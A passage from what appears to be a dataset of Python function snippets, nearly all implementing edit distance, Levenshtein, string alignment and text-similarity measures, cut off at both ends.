range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def editDistance(l1, l2):\n cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]\n \n for row in range(len(l1) + 1):\n for col in range(len(l2) + 1):\n if row == 0 and col == 0:\n cache[row][col] = 0\n elif col == 0:\n cache[row][col] = row\n elif row == 0:\n cache[row][col] = col\n elif l1[row - 1] == l2[col - 1]:\n cache[row][col] = cache[row - 1][col - 1]\n else:\n a = cache[row - 1][col]\n b = cache[row][col - 1]\n c = cache[row - 1][col - 1]\n cache[row][col] = min(a, b, c) + 1\n\n return findResult(l1, l2, cache)", "def levenshtein_distance(s, t, alphabet=string.printable, **weight_dict):\n if len(s) == 0 or len(t) == 0:\n return max([len(s), len(t)])\n\n rows = len(s) + 1\n cols = len(t) + 1\n\n w = dict((x, (1, 1, 1)) for x in alphabet + alphabet.upper())\n if weight_dict:\n w.update(weight_dict)\n\n dist = [[0 for _ in range(cols)] for _ in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for row in range(1, rows):\n dist[row][0] = dist[row - 1][0] + w[s[row - 1]][0]\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for col in range(1, cols):\n dist[0][col] = dist[0][col - 1] + w[t[col - 1]][1]\n\n for col in range(1, cols):\n for row in range(1, rows):\n deletes = w[s[row - 1]][0]\n inserts = w[t[col - 1]][1]\n subs = max((w[s[row - 1]][2], w[t[col - 1]][2]))\n if s[row - 1] == t[col - 1]:\n subs = 0\n else:\n subs = subs\n dist[row][col] = min(\n dist[row - 1][col] + deletes,\n dist[row][col - 1] + inserts,\n dist[row - 1][col - 1] + subs,\n ) # substitution\n\n return dist[row][col]", "def edit_distance(wordA, wordB):\n if not isinstance(wordA,list):\n lettersA = tamil.utf8.get_letters(wordA)\n else:\n lettersA = wordA\n\n if not isinstance(wordB,list):\n lettersB = tamil.utf8.get_letters(wordB)\n else:\n lettersB = wordB\n n_A = len(lettersA)\n n_B = len(lettersB)\n dist_AB = [[0 for i in range(0, n_B + 1)] for i in range(0, (n_A + 1))]\n # Target prefix reached by insertion\n for j in range(1, n_B + 1):\n dist_AB[0][j] = j\n for i in range(1, n_A + 1):\n dist_AB[i][0] = i\n for j in range(1, n_B + 1):\n for i in range(1, n_A + 1):\n if lettersA[i - 1] == lettersB[j - 1]:\n new_dist = dist_AB[i - 1][j - 1]\n else:\n new_dist = min(\n [\n dist_AB[i - 1][j] + 1,\n dist_AB[i][j - 1] + 1,\n dist_AB[i - 1][j - 1] + 1,\n ]\n ) # del, ins, or sub\n dist_AB[i][j] = new_dist\n return dist_AB[-1][-1]", "def minimum_edit_distance(seq1,seq2):\n if len(seq1) > len(seq2):\n seq1,seq2 = seq2,seq1\n distances = range(len(seq1) + 1)\n for index2,char2 in enumerate(seq2):\n newDistances = [index2+1]\n for index1,char1 in enumerate(seq1):\n if char1 == char2:\n newDistances.append(distances[index1])\n else:\n newDistances.append(1 + min((distances[index1],\n distances[index1+1],\n newDistances[-1])))\n distances = newDistances\n return distances[-1]", "def edit_distance(left, right):\n similarities = np.zeros((len(left) + 1, len(right) + 1), dtype=np.int32)\n similarities[:, 0] = range(len(left) + 1)\n similarities[0, :] = range(len(right) + 1)\n\n for l in range(1, len(left) + 1):\n for r in range(1, len(right) + 1):\n sub_cost = 0 if left[l - 1] == right[r - 1] else 1\n similarities[l][r] = min(similarities[l - 1][r] + 1,\n similarities[l][r - 1] + 1,\n similarities[l - 1][r - 1] + sub_cost)\n return similarities[len(left), len(right)]", "def min_edit_distance(x: str, y: str, return_matrix: bool = False) -> object:\n m = _get_edit_distance_matrix(x, y)\n\n for i in range(1, len(x) + 1):\n\n for j in range(1, len(y) + 1):\n # How do we obtain the m[i][j] value?\n # We need to look at three positions while iterating:\n # 1. m[i - 1][j -1]\n # 2. m[i][j - 1]\n # 3. m[i - 1][j]\n\n # x[i - 1] and y[j - 1] are the characters.\n\n # Note: i and j start from 1.\n\n # If the characters are equal, we don't need to perform any of the\n # operations: insertion, deletion or substitution, and the minimum\n # edit distance to convert x[i - 1] to y[j - 1] is the same as the\n # one to convert x[i] to s[j], because, as stated above, x[i - 1]\n # and y[j - 1] are equal, so we don't have to perform any other\n # operation.\n if x[i - 1] == y[j - 1]:\n m[i][j] = m[i - 1][j - 1]\n else:\n m[i][j] = min(m[i - 1][j - 1] + 1, m[i - 1]\n [j] + 1, m[i][j - 1] + 1)\n\n return m[len(x)][len(y)] if not return_matrix else m", "def leveinshtein_distance(source,target):\r\n\t#Step 1\r\n\ts_len=len(source)\r\n\tt_len=len(target)\r\n\tcost=0\r\n\tif(s_len==0):\r\n\t\treturn t_len\r\n\tif(t_len==0):\r\n\t\treturn s_len\r\n\tprint(\"Dimensions:\\n\\tN:%d\\n\\tM:%d\"%(s_len,t_len))\r\n\t#Step 2\r\n\tmatrix=[[0 for _ in range(0,t_len+1)] for _ in range(0, s_len+1)]\r\n\t#Initialize first row 0..s_len\r\n\tfor idx in range(0,s_len+1):\r\n\t\tmatrix[idx][0]=idx\r\n\t#Initialize the first column 0..t_len\r\n\tfor idx in range(0, t_len+1):\r\n\t\tmatrix[0][idx]=idx\r\n\tprint(\"===Original===\")\r\n\tprint_matrix(matrix,source,target)\r\n\t#Step 3\r\n\tfor i in range(1,s_len+1):\r\n\t\tch=source[i-1]\r\n\t\t#print(ch)\r\n\t\t#Step 4\r\n\t\tfor j in range(1,t_len+1):\r\n\t\t\t#print(\">%s\"%target[j-1])\r\n\t\t\t#Step 5\r\n\t\t\tif ch==target[j-1]:\r\n\t\t\t\tcost=0\r\n\t\t\telse:\r\n\t\t\t\tcost=1\r\n\t\t\t#Step 6\r\n\t\t\t\r\n\t\t\t#print(\"(i,j)=>(%d,%d)\"%(i,j))\r\n\t\t\t#print(matrix[i][j])\r\n\t\t\tmatrix[i][j]=minimum(\r\n\t\t\t\tmatrix[i-1][j]+1,\r\n\t\t\t\tmatrix[i][j-1]+1,\r\n\t\t\t\tmatrix[i-1][j-1]+cost\r\n\t\t\t)\r\n\tprint(\"===Final Matrix===\")\r\n\tprint_matrix(matrix,source,target)\r\n\treturn matrix[s_len-1][t_len-1]", "def minDistance(self, word1: str, word2: str) -> int: \n len_one = len(word1)\n len_two = len(word2)\n\n # Create matrix which will keep a running count of the minimum number\n # of edits needed \n dp = [[0 for c in range(len_one + 1)] for r in range(len_two + 1)]\n\n # In this case, the rows correspond to the letters of word2\n # while the columns correspond to the letters of word1\n for i in range(0, len_two + 1):\n for j in range(0, len_one + 1):\n # The first row column should just be a linear increasing\n # function of j. It is the equivalent of saying starting \n # from nothing, how many edits must be made to have a string\n # of length j\n if j == 0:\n dp[i][j] = i\n # Same for i. See the example matrix.\n elif i == 0:\n dp[i][j] = j\n else:\n # need i - 1 and j - 1, otherwise an index errror will occur.\n # Remember that our matrix is of size len_one + 1)] for r in range(len_two + 1\n if word2[i - 1] == word1[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = 1 + min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1])\n\n return dp[-1][-1]", "def iterated_lev_dist(a, b, tolerance=5):\n lenA, lenB = _len(a), _len(b)\n\n # Optimize away edge cases...\n if a == b:\n return 0\n\n # Lower bound is length diff, quit if length difference is too big\n if _abs(lenA - lenB) > tolerance:\n return -1\n\n # Quit early if we know the minimum number of substitutions to make will\n # already be too big\n min_substitutions = _len(_symdif({*a}, {*b})) / 2\n if min_substitutions > tolerance:\n return -1\n\n # We need 2 arrays, 1 larger than the compared\n slots = _len(b) + 1\n v0 = list(range(slots))\n v1 = [0] * slots\n\n # print(' ', ' '.join(t))\n # Walking over rows. Each row represents one step along the source string.\n # Last cell of last row gives us the edit distance.\n for i, A in enumerate(a):\n # First cell of each row is for comparison against empty string\n # the cost is always equal to length of source string walked so far\n v1[0] = i + 1\n\n for j, B in enumerate(b):\n delCost = v0[j + 1] + 1 # j+1 since the first value in the row\n # is distance from an empty str\n subCost = v0[j] + (A != B) # substitution\n insCost = v1[j] + 1 # the insert cost is always at least 1\n v1[j + 1] = _min(delCost, insCost, subCost)\n\n # When moving to next row, current row\n v0 = _lcopy(v1)\n # print(A, v0)\n return v0[-1]", "def edit_distance(str1, str2):\n\n if not str1:\n return len(str2)\n if not str2:\n return len(str1)\n\n DP = [[-1 for __ in str2] for ___ in str1]\n DP[0][0] = 0 if str1[0] == str2[0] else 1\n\n\n for x, let1 in enumerate(str1):\n startat = 0\n if x == 0:\n startat = 1\n for y, let2 in enumerate(str2[startat:], startat):\n minimum = float('inf')\n if x != 0:\n minimum = min(DP[x-1][y] + 1, minimum)\n if y != 0:\n minimum = min(DP[x-1][y-1] + (0 if let1 == let2 else 1), minimum)\n if y != 0:\n minimum = min(DP[x][y-1] + 1, minimum)\n\n DP[x][y] = minimum\n\n return DP[len(str1) - 1][len(str2) - 1]", "def line_edits(s1, s2):\n l1 = s1.splitlines()\n l2 = s2.splitlines()\n \n result = editDistance(l1, l2)\n \n result = result[::-1]\n \n return result", "def levenshtein_normalised(str1, str2):\n\treturn levenshtein(str1, str2, normalise=True)", "def distance(str1, str2):\n return levenshtein.normalized_distance(str1, str2)", "def levenshtein(source, target):\n if len(source) < len(target):\n return levenshtein(target, source)\n\n # So now we have len(source) >= len(target).\n if len(target) == 0:\n return len(source)\n\n # We call tuple() to force strings to be used as sequences\n # ('c', 'a', 't', 's') - numpy uses them as values by default.\n source = np.array(tuple(source))\n target = np.array(tuple(target))\n\n # We use a dynamic programming algorithm, but with the\n # added optimization that we only need the last two rows\n # of the matrix.\n previous_row = np.arange(target.size + 1)\n for s in source:\n # Insertion (target grows longer than source):\n current_row = previous_row + 1\n\n # Substitution or matching:\n # Target and source items are aligned, and either\n # are different (cost of 1), or are the same (cost of 0).\n current_row[1:] = np.minimum(\n current_row[1:],\n np.add(previous_row[:-1], target != s))\n\n # Deletion (target grows shorter than source):\n current_row[1:] = np.minimum(\n current_row[1:],\n current_row[0:-1] + 1)\n\n previous_row = current_row\n\n return previous_row[-1]", "def lemmas_similarity(s1, s2, filter_stop_words=True):\n # Tokenize by sentences into words in lower case \n tokenized_sentence_1 = nltk.word_tokenize(s1.lower())\n tokenized_sentence_2 = nltk.word_tokenize(s2.lower())\n \n if not filter_stop_words:\n tokenized_sentence_1 = [token for token in tokenized_sentence_1 if token not in stop_words]\n tokenized_sentence_2 = [token for token in tokenized_sentence_2 if token not in stop_words]\n \n tagged_sentence_1 = pos_tag(tokenized_sentence_1) # [ (word, POS_TAG), ...]\n tagged_sentence_2 = pos_tag(tokenized_sentence_2) # [ (word, POS_TAG), ...]\n \n lemmas_sentence_1 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_1] \n lemmas_sentence_2 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_2] # [LEMMA_1, ...]\n \n # Compute similarity\n if len(lemmas_sentence_1) > 0 and len(lemmas_sentence_2) > 0:\n similarity = 1 - jaccard_distance(set(lemmas_sentence_1), set(lemmas_sentence_2))\n # Compute label of similarity \n return similarity\n else:\n return 0", "def matrix_score(sequence1: str, sequence2: str, matrix_str: str = BLOSUM62) -> int:\r\n score_matrix = _load_matrix(matrix_str)\r\n score = 0\r\n for amino1, amino2 in zip(sequence1, sequence2):\r\n try:\r\n current_score = score_matrix[amino1.upper()][amino2.upper()]\r\n score += current_score\r\n print(f'{amino1} <-> {amino2}: {current_score}')\r\n except KeyError:\r\n raise AminoAcidNotFoundError(f'Scoring matrix does not support scoring for: (\\'{amino1}\\', \\'{amino2}\\')')\r\n return score", "def pos_match(self, a, b, threshold=0.5):\r\n # pos_a = map(self.get_wordnet_pos, nltk.pos_tag(word_tokenize(a)))\r\n # pos_b = map(self.get_wordnet_pos, nltk.pos_tag(word_tokenize(b)))\r\n pos_a = [self.get_wordnet_pos(token) for token in nltk.pos_tag(word_tokenize(a))]\r\n pos_b = [self.get_wordnet_pos(token) for token in nltk.pos_tag(word_tokenize(b))]\r\n lemmae_a = [self.lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_a \\\r\n if pos == wordnet.NOUN and token.lower().strip(string.punctuation) not in self.stopwords]\r\n lemmae_b = [self.lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_b \\\r\n if pos == wordnet.NOUN and token.lower().strip(string.punctuation) not in self.stopwords]\r\n\r\n # Calculate Jaccard similarity\r\n ratio = len(set(lemmae_a).intersection(lemmae_b)) / float(len(set(lemmae_a).union(lemmae_b)))\r\n return ratio\r\n # if ratio >= threshold: return ratio\r\n # return (ratio >= threshold)\r", "def edit_distance(str_1, str_2):\n return edit_distance_dp(str_1, len(str_1), str_2, len(str_2))", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score", "def levenshtein_similarity(self, top, rows):\n if len(rows) > 1:\n return (\n [(1 - editdistance.eval(top, rows[i]) / max(len(top), len(rows[i]))) for i in\n range(0, len(rows))])\n else:\n return 1", "def editing_distance(str1: str, str2: str) -> int:\r\n if not str1 and not str2:\r\n return 0\r\n if not str1:\r\n return len(str2)\r\n if not str2:\r\n return len(str1)\r\n if str1[0] == str2[0]:\r\n return min(editing_distance(str1[1::], str2[1::]), 1 + editing_distance(str1, str2[1::]),\r\n 1 + editing_distance(str1[1::], str2))", "def matcher(features1, features2):\n #TODO: write a matching function\n #Performing the L2-Norm\n new_features1=[]\n new_features2=[]\n for itr in range(5):\n [rootOfSquare1,rootOfSquare2] = sumOfSquares(features1[itr],features2[itr])\n new_features1.append(np.array(features1[itr])/rootOfSquare1)\n new_features2.append(np.array(features2[itr])/rootOfSquare2)\n indices = []\n for itr in range(len(new_features1)):\n findMinDist=[]\n #findMaxCosineVal=[]\n for itr2 in range(len(new_features2)):\n f1 = new_features1[itr]\n f2 = new_features2[itr2]\n\n #For evaluating the cosine similarity\n # [rootOfSquare1,rootOfSquare2] = sumOfSquares(f1,f2)\n # numerator = np.array(f1)*np.array(f2)\n # numeratorSum = sum(numerator)\n # denominator = rootOfSquare1*rootOfSquare2\n # cosine = np.divide(numeratorSum,denominator)\n # findMaxCosineVal.append(cosine)\n\n #For evaluating the similarity based on euclidean distance\n Dist = np.array(f1) - np.array(f2)\n sum=0\n for i in Dist:\n sum=sum+math.pow(i,2)\n rootOfSum = math.sqrt(sum)\n findMinDist.append(rootOfSum)\n # print \"itr: \", itr, \" Matching scores: \", findMaxCosineVal\n # bestMatch = findMaxCosineVal.index(max(findMaxCosineVal))\n bestMatch = findMinDist.index(min(findMinDist))\n indices.append([itr,bestMatch])\n return indices", "def optimal_string_alignment_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(optimal_string_alignment_distance(s1, s2)) / max_cost", "def levenshtein_distance(s1, s2, insert=None, delete=None, substitute=None,\n insert_default=1, delete_default=1, substitute_default=1):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n insert = insert if isinstance(insert, dict) else {}\n delete = delete if isinstance(delete, dict) else {}\n substitute = substitute if isinstance(substitute, dict) else {}\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n if n1 == 0 and n2 == 0:\n return 0\n\n # if n1 == 0 or n2 == 0:\n # return max(n1, n2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n for i in range(n1 + 1):\n for j in range(n2 + 1):\n if i == 0 and j == 0: # [0,0]\n continue\n elif i == 0: # most top row\n c = s2[j - 1]\n dp[i][j] = insert[c] if c in insert else insert_default\n dp[i][j] += dp[i][j - 1]\n elif j == 0: # most left column\n c = s1[i - 1]\n dp[i][j] = delete[c] if c in delete else delete_default\n dp[i][j] += dp[i - 1][j]\n else:\n c1, c2 = s1[i - 1], s2[j - 1]\n insert_cost = insert[c2] if c2 in insert else insert_default\n delete_cost = delete[c1] if c1 in delete else delete_default\n substitute_cost = substitute[c1][c2] \\\n if c1 in substitute and c2 in substitute[c1] else substitute_default\n\n if c1 == c2:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i][j - 1] + insert_cost,\n dp[i - 1][j] + delete_cost,\n dp[i - 1][j - 1] + substitute_cost)\n return dp[n1][n2]", "def calculate_score(s1, s2, l1, l2, startpoint):\n\n matched = \"\" # to hold string displaying alignments\n score = 0\n for i in range(l2):\n if (i + startpoint) < l1:\n if s1[i + startpoint] == s2[i]: # if the bases match\n matched = matched + \"*\" # * indicates a match\n score = score + 1\n else:\n matched = matched + \"-\" # - indicates no match\n\n return score", "def Levenshtein(a, b):\n v0 = list(range(len(b)+1))\n v1 = list(range(len(b)+1)) # Or whatever.\n\n for i in range(len(a)):\n v1[0] = i + 1\n\n for j in range(len(b)):\n deletionCost = v0[j + 1] + 1\n insertionCost = v1[j] + 1\n substitutionCost = v0[j] if a[i] == b[j] else v0[j]+1\n v1[j + 1] = min(deletionCost, insertionCost, substitutionCost)\n\n v1, v0 = v0, v1\n return v0[len(b)]", "def similarity(a, b):\n distance = Levenshtein.distance(a, b)\n return 1 - (distance / max((len(a), len(b))))", "def compare_stability_matrices(ism1, ism2): \n \n import scipy as sp\n import sklearn as sk\n\n ism1=sk.preprocessing.normalize(ism1,norm='l2')\n ism2=sk.preprocessing.normalize(ism2,norm='l2')\n distance=sp.spatial.distance.correlation(ism1.ravel(), ism2.ravel())\n similarity= 1-distance\n return similarity", "def levenshtein_similarity(s1, s2, insert=None, delete=None, substitute=None,\n insert_default=1, delete_default=1, substitute_default=1,\n lower_bound=None):\n insert = insert if isinstance(insert, dict) else {}\n delete = delete if isinstance(delete, dict) else {}\n substitute = substitute if isinstance(substitute, dict) else {}\n\n def compute_max_cost(s):\n return sum([\n max(\n insert[c] if c in insert else insert_default,\n delete[c] if c in delete else delete_default,\n substitute[c] if c in substitute else substitute_default\n ) for c in s\n ])\n\n def estimate_min_char_cost(s):\n return min([min(\n insert[c] if c in insert else insert_default,\n delete[c] if c in delete else delete_default,\n substitute[c] if c in substitute else substitute_default\n ) for c in s])\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n max_cost = max(compute_max_cost(s1), compute_max_cost(s2))\n\n if lower_bound:\n diff = abs(len(s1) - len(s2))\n if len(s1) == 0 and len(s2) == 0:\n return 1.0\n elif len(s1) == 0:\n min_lev = float(diff * estimate_min_char_cost(s2))\n elif len(s2) == 0:\n min_lev = float(diff * estimate_min_char_cost(s1))\n else:\n min_lev = float(diff * min(estimate_min_char_cost(s1), estimate_min_char_cost(s2)))\n est_sim = 1.0 - min_lev / max_cost\n if est_sim < lower_bound:\n return 0.0\n\n lev = levenshtein_distance(s1, s2, insert, delete, substitute,\n insert_default, delete_default, substitute_default)\n\n if max_cost < lev:\n raise ValueError('Illegal value of operation cost')\n\n if max_cost == 0:\n return 1.0\n\n lev_sim = 1.0 - float(lev) / max_cost\n if lower_bound and lev_sim < lower_bound:\n return 0.0\n return lev_sim", "def edit_distance(self):\n\n edit_dist = 0\n misaligned = False\n\n try:\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = [g.strip() for g in gt_file.readlines()]\n\n num_symbols = 0\n bd = 0\n # Go through all lines (for polyphony)\n for i in range(len(out_lines)):\n # Skip comparing sequence staff line\n if 'Sequence staff' in gt_lines[i]:\n continue\n\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n #print('Out:',out_split)\n #print('Gt:',gt_split)\n\n num_symbols += len(gt_split) # for calculating symbol error rate\n misaligned = 'misaligned' in out_lines[i] # for ensembling\n\n _a = [symbol for symbol in out_split if symbol != '\\n' and symbol != -1]\n _b = [symbol for symbol in gt_split if symbol != '\\n' and symbol != -1]\n\n ed = self.levenshtein(_a,_b)\n \n # Account for barline at end (don't use when checking CRNN output)\n #if ed == 1 and out_split[-1] == 'barline' and gt_split[-1] != 'barline':\n # ed = 0\n \n edit_dist += ed\n \n staff_num = (i + 1) // 2\n \n if ed == 1:\n pass\n #print(self.output_file)\n #print('Edit dist (staff #%d): %d' % (staff_num, ed))\n \n if _a[-1] == 'barline' and _b[-1] != 'barline' or \\\n _a[-1] != 'barline' and _b[-1] == 'barline':\n #print('Barline diff') \n # print(self.output_file)\n bd = 1\n #print(_a)\n #print(_b)\n \n\n '''\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n '''\n except FileNotFoundError:\n print('Missing:',self.output_file, self.gt_file)\n return -1, 1, 0, False\n #print('Found:',self.output_file, self.gt_file)\n return edit_dist, num_symbols, bd, misaligned", "def simple_baseline_similarity(s1, s2):\n # Tokenize by sentences into words in lower case \n tokenized_sentence_1 = nltk.word_tokenize(s1.lower())\n tokenized_sentence_2 = nltk.word_tokenize(s2.lower())\n\n tagged_sentence_1 = pos_tag(tokenized_sentence_1) # [ (word, POS_TAG), ...]\n tagged_sentence_2 = pos_tag(tokenized_sentence_2) # [ (word, POS_TAG), ...]\n \n lemmas_sentence_1 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_1 if not tagged_word in stop_words] \n lemmas_sentence_2 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_2 if not tagged_word in stop_words] # [LEMMA_1, ...]\n \n word_seq_match = difflib.SequenceMatcher(None, tokenized_sentence_1, tokenized_sentence_2)\n word_match = word_seq_match.find_longest_match(0, len(tokenized_sentence_1), 0, len(tokenized_sentence_2))\n\n lemm_seq_match = difflib.SequenceMatcher(None, lemmas_sentence_1, lemmas_sentence_2)\n lemm_match = lemm_seq_match.find_longest_match(0, len(lemmas_sentence_1), 0, len(lemmas_sentence_2))\n\n word_sim = word_match.size/(max(len(tokenized_sentence_1), len(tokenized_sentence_2)) + 0.001)\n lemm_sim = lemm_match.size/(max(len(lemmas_sentence_1), len(lemmas_sentence_2)) + 0.001)\n\n return word_sim, lemm_sim", "def __init__(self,alphabet=\"amino\",dist_function=\"simple\"):\n\n # initialize internal variables\n self.alphabet = alphabet\n self.dist_function = dist_function\n\n # decide on the alphabet\n if self.alphabet == \"amino\": \n self._alphabet_string = \"*ABCDEFGHIKLMNPQRSTVWXYZ\"\n else:\n raise ValueError(\"alphabet not recongized.\")\n \n if self.dist_function == \"simple\":\n self._dist_function_internal = 0\n elif self.dist_function == \"dl\":\n self._dist_function_internal = 1\n else:\n err = \"dist_function not recognized. should be 'simple' or 'dl' (Damerau-Levenshtein)\\n\"\n raise ValueError(err)\n \n self.alphabet_size = len(list(self._alphabet_string))\n\n enum_list = zip(self._alphabet_string,range(len(self._alphabet_string)))\n self._alphabet_dict = dict([(a, i) for a, i in enum_list])\n\n tmp_matrix = np.zeros((self.alphabet_size,self.alphabet_size),dtype=int)\n for k1 in self._alphabet_string:\n i = self._alphabet_dict[k1] \n for k2 in self._alphabet_string:\n j = self._alphabet_dict[k2]\n if k1 == k2:\n tmp_matrix[i,j] = 0\n else:\n tmp_matrix[i,j] = 1\n\n self.dist_matrix = tmp_matrix", "def iterative_levenshtein(s, t):\n rows = len(s)+1\n cols = len(t)+1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings \n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n \n for col in range(1, cols):\n for row in range(1, rows):\n if s[row-1] == t[col-1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row-1][col] + 1, # deletion\n dist[row][col-1] + 1, # insertion\n dist[row-1][col-1] + cost) # substitution\n #for r in range(rows):\n #print(dist[r])\n \n \n return dist[row][col]", "def optimal_string_alignment_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n\n for i in range(0, n1 + 1):\n dp[i][0] = i\n for j in range(0, n2 + 1):\n dp[0][j] = j\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n cost = 0 if s1[i - 1] == s2[j - 1] else 1\n\n dp[i][j] = min(dp[i][j - 1] + 1,\n dp[i - 1][j] + 1,\n dp[i - 1][j - 1] + cost)\n\n if i > 1 and j > 1 and s1[i - 1] == s2[j - 2] and s1[i - 2] == s2[j - 1]:\n dp[i][j] = min(dp[i][j], dp[i - 2][j - 2] + cost)\n\n return dp[n1][n2]", "def distance(str1, str2):\n m = np.zeros([len(str2)+1, len(str1)+1])\n for x in range(1, len(str2) + 1):\n m[x][0] = m[x-1][0] + 1\n for y in range(1, len(str1) + 1):\n m[0][y] = m[0][y-1] + 1\n for x in range(1, len(str2) + 1):\n for y in range(1, len(str1) + 1):\n if str1[y-1] == str2[x-1]:\n dg = 0\n else:\n dg = 1\n m[x][y] = min(m[x-1][y] + 1, m[x][y-1] + 1, m[x-1][y-1] + dg)\n return int(m[len(str2)][len(str1)])", "def _edit_distance(prediction_tokens: List[str], reference_tokens: List[str]) ->int:\n dp = [([0] * (len(reference_tokens) + 1)) for _ in range(len(prediction_tokens) + 1)]\n for i in range(len(prediction_tokens) + 1):\n dp[i][0] = i\n for j in range(len(reference_tokens) + 1):\n dp[0][j] = j\n for i in range(1, len(prediction_tokens) + 1):\n for j in range(1, len(reference_tokens) + 1):\n if prediction_tokens[i - 1] == reference_tokens[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1\n return dp[-1][-1]", "def test_filter_samples_from_distance_matrix(self):\r\n actual = filter_samples_from_distance_matrix(\r\n parse_distmat(self.input_dm1),\r\n [\"GHI blah\", \"XYZ\"])\r\n self.assertEqual(actual, expected_dm1a)\r\n actual = filter_samples_from_distance_matrix(\r\n parse_distmat(self.input_dm1),\r\n [\"GHI\", \"DEF\"])\r\n self.assertEqual(actual, expected_dm1b)", "def 